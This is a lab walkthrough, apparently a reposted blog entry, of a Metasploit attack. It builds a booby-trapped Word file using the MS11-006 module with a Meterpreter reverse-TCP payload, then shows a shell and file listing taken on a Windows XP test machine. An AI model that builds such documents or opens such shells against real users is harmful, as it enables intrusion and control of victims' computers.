Metasploit file Format Vulnerability penetration attack (successfully obtained shell)

Source: Internet
Author: User
Tags sessions win32

Environmental BT5R1

MSF > Use windows/fileformat/ms11_006_createsizeddibsection MSF Exploit (ms11_006_createsizeddibsection) > set Payload WINDOWS/METERPRETER/REVERSE_TCP payload = windows/meterpreter/reverse_tcp MSF exploit (ms11_006_ Createsizeddibsection) > Set lhost 192.168.1.11 lhost = 192.168.1.11 MSF exploit (ms11_006_createsizeddibsection) > Set lport 443 lport = 443 MSF exploit (ms11_006_createsizeddibsection) > Set Outputpath/opt/framework/msf3/da Ta/exploits/outputpath =/opt/framework/msf3/data/exploits/msf Exploit (ms11_006_createsizeddibsection) >                     Show Options Module Options (exploit/windows/fileformat/ms11_006_createsizeddibsection): Name current Setting Required Description--------------------------------------FILE
   Name Msf.doc yes the file name.


Outputpath/opt/framework/msf3/data/exploits/yes the output path to use. Payload Options (WINDOWS/METERPRETER/REVERSE_TCP): Name current Setting Required Description------------------------ --------------exitfunc seh yes Exit Technique:seh, thread, process, none Lhost 192.168.1 . One yes the Listen address Lport 443 Yes the listen port Exploit target:id Nam E------0 Automatic MSF exploit (ms11_006_createsizeddibsection) > exploit [*] Creating ' msf.doc ' file:
. [*] Generated output File/opt/framework/msf3/data/exploits/msf.doc MSF exploit (ms11_006_createsizeddibsection) > use Multi/handler MSF exploit (handler) > Set payload windows/meterpreter/reverse_tcp payload = windows/meterpreter/ Reverse_tcp MSF exploit (handler) > Set lhost 192.168.1.11 lhost = 192.168.1.11 MSF exploit (handler) > Set Lpor

T 443 lport = 443 MSF exploit (handler) > exploit-j [*] exploit running as background job. [*] Started Reverse Handler on 192.168.1.11:443 
[*] Starting the payload handler ... MSF exploit (handler) > Sessions-l active Sessions =============== No active session  S. MSF exploit (handler) >

Copy the Msf.doc into XP, start, double click, BT5 not respond.

Later, I use thumbnails to view, do not need to double-click Msf.doc,bt5 to have a reaction (the book said to open the document, estimated error).

MSF exploit (handler) > [*] Sending stage (752128 bytes) to 192.168.1.143 [*] Meterpreter Session 1 opened (192.168.1. 11:443-192.168.1.143:1099) at 2013-05-14 19:32:47-0400 MSF exploit (handler) > sessions-l Active sessions = = =                   ============ Id Type Information Connection------ ---------------------1 meterpreter x86/win32 Root-4556186478\adminis  Trator @ ROOT-4556186478 192.168.1.11:443-192.168.1.143:1099 MSF exploit (handler) > Sessions-i 1 [*] Starting

Interaction with 1 ...

Meterpreter > ls listing:c:\documents and Settings\Administrator ================================================              Mode Size Type Last modified Name-------------------------
----40777/rwxrwxrwx 0 dir 2013-05-14 10:20:44-0400. 40777/rwxrwxrwx 0 dir 2013-05-14 10:20:43-0400  .. 40555/r-xr-xr-x 0 dir 2013-05-14 10:21:13-0400 application Data 40777/rwxrwxrwx 0 dir 2013-05-14 10: 14:40-0400 Cookies 40777/rwxrwxrwx 0 dir 2013-05-14 17:51:30-0400 Desktop 40555/r-xr-xr-x 0 dir 20 13-05-14 10:21:21-0400 Favorites 40777/rwxrwxrwx 0 dir 2013-05-14 17:51:30-0400 Local Settings 40555/R-XR-XR -X 0 dir 2013-05-14 10:21:22-0400 My Documents 100666/rw-rw-rw-786432 fil 2013-05-14 11:30:17-0400 ntus ER.  DAT 40777/rwxrwxrwx 0 dir 2013-05-14 17:51:30-0400 nethood 40777/rwxrwxrwx 0 dir 2013-05-14 17:51:30 -0400 printhood 40555/r-xr-xr-x 0 dir 2013-05-14 11:30:35-0400 recent 40555/r-xr-xr-x 0 dir 2013-0       5-14 10:21:02-0400 SendTo 40555/r-xr-xr-x 0 dir 2013-05-14 17:51:30-0400 Start Menu 40777/rwxrwxrwx 0 Dir 2013-05-14 10:10:10-0400 Templates 100666/rw-rw-rw-1024 fil 2013-05-14 11:32:49-0400 Ntuser.dat.LOG 100 666/rw-rw-rw-1Fil 2013-05-14 10:23:33-0400 ntuser.ini meterpreter > SysInfo computer:root-4556186478 OS
: Windows XP (Build 2600, Service Pack 3).
Architecture:x86 System language:en_us meterpreter:x86/win32 Meterpreter > Shell Process 1888 created.
Channel 1 created.

Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\administrator>

If you switch to the Simplified Chinese version of XP and view it with thumbnails, you will fail to get the shell.


Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.